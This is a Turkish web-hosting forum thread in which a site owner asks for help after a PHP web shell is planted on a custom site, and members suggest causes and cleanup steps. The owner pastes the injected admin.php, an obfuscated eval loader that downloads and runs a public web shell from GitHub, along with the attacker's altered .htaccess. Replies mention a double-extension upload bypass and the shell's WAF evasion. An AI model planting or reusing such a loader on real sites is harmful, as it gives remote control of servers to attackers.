Galiba Shell Atılmış

Question

Not : Sitem wordpress değil özel script Arkadaşlar sabah kalktığımda sitemde http 500 hatası alıyordum index.php yerine default bir wp indexi atılmış. Sonra htaccess dosyam değişti kategorilere ulaşamıyordum. Şimdi dikkat ettim dosyaların içinde ab.php ve admin.php diye 2 dosya daha var. * bilgisayarımda her zaman antivirüs uygulaması güncel bir şekilde kurulu ve dosyaların hepsini indirip tekrar tarattığımda herhangi bir virüs bulunamadı. Farklı bir yoldan atılmış olabilir mi? Bu aşamada uygulamam gereken adımlar nelerdir? admin.php içeriği ; ".file_get_contents/*******/("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php"));/**/?>böyle garip bir şey. önce değiştirilen index; [COLOR=#607D8B][FONT=Titillium Web, sans-serif][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]Order allow,deny[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]Deny from all[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]Order allow,deny[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]Allow from all[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]RewriteEngine On[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]RewriteBase /[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]RewriteRule ^index\.php$ - [L][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]RewriteCond %{REQUEST_FILENAME} !-f[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]RewriteCond %{REQUEST_FILENAME} !-d[/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"]RewriteRule . /index.php [L][/FONT][/COLOR] [COLOR=#607D8B][FONT="Titillium Web"][/FONT][/COLOR]

NextWorld · Answer

***Formlarınızda açık olabilir.
***Bilgisayarınızda yer alan anti virüs PHP içerisindeki açıkları bulamaz dolayısı ile bu eylem zaman kaybıdır. 
***Dosyaların yedekten tekrar kurulması gerekir. Yedek bulunmuyorsa tüm dosyalar indirilip tek tek kodları kontrol edilmelidir.
***Ardından açık kapatılmalıdır.

Crazy · Answer

Admin panele sızmıştır muhtemelen şifre denemesi ile basit ise brute force veya türevi programlar ile geçilir.

uof52 · Answer

Bir kaç müşterimde de aynı kodlara rasgeldim . Resim upload yerlerinde kontrol olmadığı için direk .php sokabiliyorlar  ; shell.jpg.php şeklinde bypass ediliyor upload yerleri /  Basit şifreler veya sql açıkları sayesinde adminden giriş yapıp işlemleri kolaylaştırıyorlar . Site adresinizi atarsanız kontrol etmek isterim

akosetr · Answer

konuda herkes genel bilgiler vermiş (konu güvenlik olunca herkes çok bilgili ama nedense hackleniyorlar) amacın sadece shelli kaldırmak olmamalı , shell soktukları açığı kapamalısın ki bir daha shell sokmasınlar. İstediğin kadar shell sil açığı kapamadıkça tekrar atarlar. Profesyonel destek almalısın , yardımcı olmak isterdim ama yanımda cihazım yok forumda farklı kişilerle görüşebilirsin. Kolay gelsin

birsevda · Answer

cNt adlı üyeden alıntı:						mesajı görüntüle									Estağfurullah hocam sorun yok. Dosyaların tüm yedekleri bende mevcut. Yeni host sağlama hizmeti varsa iletişime geçip sorarım hocam daha iyi olur benim içinde. Db dosyalarına bulaşmıyor değil mi bunlar yani indirip ordan geri kurabilirim db yedeğini?
Birde galiba arkadaş benim admin panelinin şifresini bulmuş adını soyadını numarasını vs yazmış herhalde admin panelden dosya yükleme kısmından da açık bulup shell kurmuş benim tahminim şimdilik bu yönde hocam.
admin.php ve ab.php dosyalarını sildim, htaccess için yazma iznini kapattım şimdilik herhangi bir sorun görünmüyor ama devam ederse tamamen sıfırlayacağım siteyi hocam.

Tüm yedekler mevcut hocam. Galiba admin panelimin şifresini kırıp girip oradan upload yoluyla bir şeyler denemişler. 		Hocam bakmakta fayda var her zaman php admine (database) ye zaten dosya felan çekıyorsa oraya da ulaşmıştır. kendine bir dosya yolu oluşturmuştur.

cNt · Answer

Pipocu adlı üyeden alıntı:						mesajı görüntüle									Orada yazılı Ad, Soyad ve Telefon shell atana ait değildir.

Bu adama gıcığı olan biridir.  		hocam masum birininmiş o isim sileceğim zaten

CliaWeb adlı üyeden alıntı:						mesajı görüntüle									Merhaba cNt,

Clamav veya imunify360 ile taratın ve dosyaları tespit edip temizleyin. Orjinal ilk dosyaları yükleyip şifreleri değiştirip sunucuya mod_security kurup katı kurallı modda çalıştırın.

İyi çalışmalar. 		teşekkür ederim

CliaWeb · Answer

cNt adlı üyeden alıntı: mesajı görüntüle

Not : Sitem wordpress değil özel script

Arkadaşlar sabah kalktığımda sitemde http 500 hatası alıyordum index.php yerine default bir wp indexi atılmış. Sonra htaccess dosyam değişti kategorilere ulaşamıyordum. Şimdi dikkat ettim dosyaların içinde ab.php ve admin.php diye 2 dosya daha var.

* bilgisayarımda her zaman antivirüs uygulaması güncel bir şekilde kurulu ve dosyaların hepsini indirip tekrar tarattığımda herhangi bir virüs bulunamadı. Farklı bir yoldan atılmış olabilir mi? Bu aşamada uygulamam gereken adımlar nelerdir?

admin.php içeriği ;

<?=/****/[MENTION=63278]Null[/MENTION]; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php"));/**/?>

böyle garip bir şey.

önce değiştirilen index;

[COLOR=#607D8B][FONT=Titillium Web, sans-serif]<?php[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]/**[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]// * Front to the WordPress application. This file doesn't do anything, but loads[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]* wp-blog-header.php which does and tells WordPress to load the theme.[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]*[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]* @package WordPress[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]*/[/FONT][/COLOR]

[COLOR=#607D8B][FONT="Titillium Web"]/**[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]* Tells WordPress to load the WordPress theme and output it.[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]*[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]* @var bool[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]*/[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]define( 'WP_USE_THEMES', true );[/FONT][/COLOR]

[COLOR=#607D8B][FONT="Titillium Web"]/** Loads the WordPress Environment and Template */[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]require __DIR__ . '/wp-blog-header.php';[/FONT][/COLOR]

değiştirilen htaccess içeriği ;

[COLOR=#607D8B][FONT="Titillium Web"]<FilesMatch ".(py|exe|php)$">[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]Order allow,deny[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]Deny from all[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]</FilesMatch>[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php)$">[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]Order allow,deny[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]Allow from all[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]</FilesMatch>[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]<IfModule mod_rewrite.c>[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]RewriteEngine On[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]RewriteBase /[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]RewriteRule ^index\.php$ - [L][/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]RewriteCond %{REQUEST_FILENAME} !-f[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]RewriteCond %{REQUEST_FILENAME} !-d[/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]RewriteRule . /index.php [L][/FONT][/COLOR]
[COLOR=#607D8B][FONT="Titillium Web"]</IfModule>[/FONT][/COLOR]

Pipocu · Answer

Orada yazılı Ad, Soyad ve Telefon shell atana ait değildir.

Bu adama gıcığı olan biridir.

ribrahimozer · Answer

Mesaj kutunuz dolu

ribrahimozer · Answer

cNt adlı üyeden alıntı: mesajı görüntüle

Hocam galiba tahmininiz doğru

adam girmiş panelde kendi adını falan yazmış numarasını yazmış çok komik gülsem mi ağlasam mı bilemedim. Şifremi nasıl bulmuş olabilir ki. Bruteforce yapmış olabilir çünkü panel şifrem baya kolaydı.

adam numarasını bile yazmış admin panele şaka gibi

hocam dosya yükleme kısmı sadece admin panelde var ve galiba admin panelimin şifresini bulmuş birisi.

Umo · Answer

Geçmiş olsun bence dosya adlarını da değiştirerek bir önlem daha almış olursunuz..

cNt · Answer

ribrahimozer adlı üyeden alıntı:						mesajı görüntüle									Telefon numarasından adama ulaşın it gibi korksun, mahkemeye vereceğim minimum 3 sene hapis cezası yersin vs deyip korkutun. Bu çaylaklığı yapmışsa muhtemelen 15 16 yaşında birisidir. 		aradım açmadı hocam, açarsa güzel şeyler söyleyeceğim

ribrahimozer · Answer

cNt adlı üyeden alıntı: mesajı görüntüle

Hocam galiba tahmininiz doğru

adam girmiş panelde kendi adını falan yazmış numarasını yazmış çok komik gülsem mi ağlasam mı bilemedim. Şifremi nasıl bulmuş olabilir ki. Bruteforce yapmış olabilir çünkü panel şifrem baya kolaydı.

adam numarasını bile yazmış admin panele şaka gibi

hocam dosya yükleme kısmı sadece admin panelde var ve galiba admin panelimin şifresini bulmuş birisi.

adam numarasını bile yazmış admin panele şaka gibi

hocam dosya yükleme kısmı sadece admin panelde var ve galiba admin panelimin şifresini bulmuş birisi. 		
Telefon numarasından adama ulaşın it gibi korksun, mahkemeye vereceğim minimum 3 sene hapis cezası yersin vs deyip korkutun. Bu çaylaklığı yapmışsa muhtemelen 15 16 yaşında birisidir.

cNt · Answer

birsevda adlı üyeden alıntı:						mesajı görüntüle									hocam bir çok arkadaş wordpress demiş siz inatla özel yazılım demişsiniz ama kimse pek takmamış dediklerinizi.
Öncelikle şunu belirteyim shell sebebini bir çok nedeni olabilir. Bu hosting firmasından kaynaklı olabilir, kullandığınız yazılımda açıklar olabilir, şifreniz ele geçmiş olabilir, pc nize trojen truva atı bulaşmış olabilir, vs vs vs bunun için onlarca neden sayarım.
Bu arada Cloudflare ddos gibi vb. saldırıları önlemek içindir. Shelli vs. engellemez. (Bilenlere duyrulur  )
Diğer bir konuda yukarda nedenleri saydım wordpress de 4 4 luk değildir açıkları vardır ama bir site shell yiyince illa wordpress olduğu için yediğini göstermez.
Gelelim hocam size öncelikle geçmiş olsun. Sizden de özür dilerim biraz sert yaptıysam sertim size değil işi bilip de bilmeyenlereydi.

Hocam eğer özel yazılımsa varsa eski bir yedeği host firmanıza diyin tamamen silsin yeniden sıfır bir host sağlasın size. Eğer bir yedek yoksa ftp de tek tek tüm dosyaları kontrol edip tek tek sileceksiniz başka yolu yok. İşin kısacası bu hocam. 		Estağfurullah hocam sorun yok. Dosyaların tüm yedekleri bende mevcut. Yeni host sağlama hizmeti varsa iletişime geçip sorarım hocam daha iyi olur benim içinde. Db dosyalarına bulaşmıyor değil mi bunlar yani indirip ordan geri kurabilirim db yedeğini?
Birde galiba arkadaş benim admin panelinin şifresini bulmuş adını soyadını numarasını vs yazmış herhalde admin panelden dosya yükleme kısmından da açık bulup shell kurmuş benim tahminim şimdilik bu yönde hocam.
admin.php ve ab.php dosyalarını sildim, htaccess için yazma iznini kapattım şimdilik herhangi bir sorun görünmüyor ama devam ederse tamamen sıfırlayacağım siteyi hocam.

NextWorld adlı üyeden alıntı:						mesajı görüntüle									***Formlarınızda açık olabilir.
***Bilgisayarınızda yer alan anti virüs PHP içerisindeki açıkları bulamaz dolayısı ile bu eylem zaman kaybıdır.
***Dosyaların yedekten tekrar kurulması gerekir. Yedek bulunmuyorsa tüm dosyalar indirilip tek tek kodları kontrol edilmelidir.
***Ardından açık kapatılmalıdır. 		Tüm yedekler mevcut hocam. Galiba admin panelimin şifresini kırıp girip oradan upload yoluyla bir şeyler denemişler.

NextWorld · Answer

FidanAtug adlı üyeden alıntı:						mesajı görüntüle									Bu yüzden wordpress kullanmıyorum.. Her hangi bir pluginde açık varsa internette paylaşılıyor ve dork ilede ulaşabiliyorlar sitenizdeki açığa.. Php ile sıfırdan yazılım yazdırmak isterseniz skype adresim imzamda. 		Bu durumun wordpress ile ilgisi nedir? Site sahibi wp kullanmadığını belirtmiş. Ek olarak eklentiler wordpress ile ilişkili değildir. 3.taraf kişilerin yazmış olduğu kodlardır.
Sizin sıfırdan yazdığınız güvenli script'e ben güvenlik açıklı bir modül geliştirsem, açıktaki hatadan siz mi sorumlu oluyorsunuz?

cNt · Answer

ozanx07 adlı üyeden alıntı:						mesajı görüntüle									Emin değilim yazılımınızı ne hakkında ama admin panelde dosya yükleme alanı olabilir mi ?

Admin panel şifreniz vs. Bulmuş olabilirler diğer türlü özel yazılımda özellik dışı dosya yükleme olacağını zannetmiyorum.

PM den veya WhatsApp dan yazarsanız akşam ilgilenebilirim &#128522;

WhatsApp 5317440523 		Hocam galiba tahmininiz doğru  adam girmiş panelde kendi adını falan yazmış numarasını yazmış çok komik gülsem mi ağlasam mı bilemedim. Şifremi nasıl bulmuş olabilir ki. Bruteforce yapmış olabilir çünkü panel şifrem baya kolaydı.

adam numarasını bile yazmış admin panele şaka gibi

Birdilimask adlı üyeden alıntı:						mesajı görüntüle									Ön kısımda post ettirdiğiniz bir form varmı? Bu form içerisinde dosya yükleme kısmı vs varmı? Admin şifreniz ne kadar güvenli? Olası neden çok. Genelde upload inputlarından atılır shell. Geçmiş olsun. 		hocam dosya yükleme kısmı sadece admin panelde var ve galiba admin panelimin şifresini bulmuş birisi.

birsevda · Answer

hocam bir çok arkadaş wordpress demiş siz inatla özel yazılım demişsiniz ama kimse pek takmamış dediklerinizi.
Öncelikle şunu belirteyim shell sebebini bir çok nedeni olabilir. Bu hosting firmasından kaynaklı olabilir, kullandığınız yazılımda açıklar olabilir, şifreniz ele geçmiş olabilir,  pc nize trojen truva atı bulaşmış olabilir, vs vs vs bunun için onlarca neden sayarım. 
Bu arada Cloudflare ddos gibi vb. saldırıları önlemek içindir. Shelli vs. engellemez. (Bilenlere duyrulur  )
Diğer bir konuda yukarda nedenleri saydım wordpress de 4 4 luk değildir açıkları vardır ama bir site shell yiyince illa wordpress olduğu için yediğini göstermez. 
Gelelim hocam size öncelikle geçmiş olsun. Sizden de özür dilerim biraz sert yaptıysam sertim size değil işi bilip de bilmeyenlereydi.

Hocam eğer özel yazılımsa varsa eski bir yedeği host firmanıza diyin tamamen silsin yeniden sıfır bir host sağlasın size. Eğer bir yedek yoksa ftp de tek tek tüm dosyaları kontrol edip tek tek sileceksiniz başka yolu yok. İşin kısacası bu hocam.

thealiyasar · Answer

Ön kısımda post ettirdiğiniz bir form varmı? Bu form içerisinde dosya yükleme kısmı vs varmı? Admin şifreniz ne kadar güvenli? Olası neden çok. Genelde upload inputlarından atılır shell. Geçmiş olsun.

ozanx07 · Answer

cNt adlı üyeden alıntı: mesajı görüntüle

Hocam galiba tahmininiz doğru

adam girmiş panelde kendi adını falan yazmış numarasını yazmış çok komik gülsem mi ağlasam mı bilemedim. Şifremi nasıl bulmuş olabilir ki. Bruteforce yapmış olabilir çünkü panel şifrem baya kolaydı.

adam numarasını bile yazmış admin panele şaka gibi

hocam dosya yükleme kısmı sadece admin panelde var ve galiba admin panelimin şifresini bulmuş birisi.

Telefon numarasından adama ulaşın it gibi korksun, mahkemeye vereceğim minimum 3 sene hapis cezası yersin vs deyip korkutun. Bu çaylaklığı yapmışsa muhtemelen 15 16 yaşında birisidir.

Admin panel şifreniz vs. Bulmuş olabilirler diğer türlü özel yazılımda özellik dışı dosya yükleme olacağını zannetmiyorum.

PM den veya WhatsApp dan yazarsanız akşam ilgilenebilirim &#128522;

WhatsApp 5317440523

cNt · Answer

ZangaTR adlı üyeden alıntı:						mesajı görüntüle									@cNt; Gecmis olsun kardeşim cloudflare önemli 		teşekkür ederim.

cloudflare'yi siteyi kurduğumdan beri kullanıyorum hocam.

AdsMonster · Answer

@cNt; Gecmis olsun kardeşim cloudflare önemli

cNt · Answer

ribrahimozer adlı üyeden alıntı:						mesajı görüntüle									Admin.php ile shell çekiyorlar 		admin.php dosyasını temizlemem yeterli olur mu? birde nereden girmiş olabilir bu dosya hocam? ben ftp bile kullanmıyorum ftp şifrem sadece yazılımcımda vardı. kendim browserdan giriyorum sadece dosya yöneticisine ve bilgisayarımda sürekli güncel bir virüs uygulamam var.

ribrahimozer · Answer

Admin.php ile shell çekiyorlar

cNt · Answer

Arkadaşlar sitem wordpress değil. Özel yazılım o yüzden çalışmamış herhalde shell garip bir durum var.

Burti adlı üyeden alıntı:						mesajı görüntüle									Hosting firmandan son yedeklerini geri yüklemesini iste.

sonra güncelle tüm eklentileri 		hocam sitem özel script

Proxcis · Answer

Site yedeği kur
***** dosya var ise sil
PHP sürümü ve siteni güncelleştir.
Cpanel Public HTML kısmında yer alan tüm dosyaları TEK TEK incele.
ADLARINA BAKMA içerik değiştirilebiliyor.
Shell dosyası olursa sistemden sil ve devam et.
Bir sorun olursa özelden yazabilirsin (siber güvenlik okuyorum)

FidanAtug · Answer

cNt adlı üyeden alıntı:						mesajı görüntüle									sitem wordpress değil, yazılımım php ile sıfırdan yazıldı zaten 		Framework kullanıldıysa sıfırdan yazılmış olmaz  Plugin bir nevi.

Omerfd · Answer

https://github.com/0x5a455553/MARIJUANA

MARIJUANA web shell is backdoor build in PHP language with stealth mode that can bypass server security. Every functions has been encoded to hex for bypassing WAF.

Shell hocam geçmiş olsun. Güvenlikte bır sıkıntı var herhalde gerekli tedbirler alınmamış olabilir.

cNt · Answer

FidanAtug adlı üyeden alıntı:						mesajı görüntüle									Bu yüzden wordpress kullanmıyorum.. Her hangi bir pluginde açık varsa internette paylaşılıyor ve dork ilede ulaşabiliyorlar sitenizdeki açığa.. Php ile sıfırdan yazılım yazdırmak isterseniz skype adresim imzamda. 		sitem wordpress değil, yazılımım php ile sıfırdan yazıldı zaten

Burti · Answer

Hosting firmandan son yedeklerini geri yüklemesini iste.

sonra güncelle tüm eklentileri

FidanAtug · Answer

Bu yüzden wordpress kullanmıyorum.. Her hangi bir pluginde açık varsa internette paylaşılıyor ve dork ilede ulaşabiliyorlar sitenizdeki açığa.. Php ile sıfırdan yazılım yazdırmak isterseniz skype adresim imzamda.